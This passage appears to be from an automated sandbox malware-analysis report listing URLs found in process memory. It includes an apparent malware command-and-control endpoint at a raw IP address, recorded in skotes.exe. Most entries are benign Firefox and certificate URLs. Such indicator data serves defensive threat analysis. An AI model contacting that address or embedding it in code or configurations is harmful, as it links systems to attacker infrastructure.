Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpJ
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa4
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedF
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedl
Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnub
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu.
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ones
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BCE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000018.00000002.2852168506.000002BA5C4F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2739033143.000002BA5C4F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D05A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2795803239.000002BA555B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000018.00000002.2797999061.000002BA55D3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A26C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A26C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.oZ
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2823349895.000002BA5A121000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791036324.0000028E95004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791036324.0000028E95081000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehaviorhttp://mozilla.org/#/properties/dnsMaxAnyPriorit
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsresource://gre/modul
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsbrowser.newtabpage.a
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratiohttp://mozilla.org/#/properti
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreadsgetAPI/register/
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0http://mozilla.org/#/properties/featureValidati
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1shutting
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/.
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/0
Source: firefox.exe, 00000018.00000003.2764877976.000002BA5AD61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2832106353.000002BA5ABDB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2668232033.000002BA5ABCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2766500542.000002BA5B07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2845824654.000002BA5BD86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842712823.000002BA5B931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885018488.000002BD0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2837480713.000002BA5ADF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2739033143.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA637D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2845824654.000002BA5BD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D0C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2832106353.000002BA5AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2767071304.000002BA5ADDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2739033143.000002BA5C4E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/U
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/Z
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/c
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2818447104.000002BA59D47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2818447104.000002BA59D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2740204931.000002BA5A4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59669000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2843439668.000002BA5BB90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2731037127.000002BA5C0DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/search
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/firefox-view-tabs-s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://devtools/shared/security/Dev
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/TelemetryTimesta
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2852168506.000002BA5C4A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
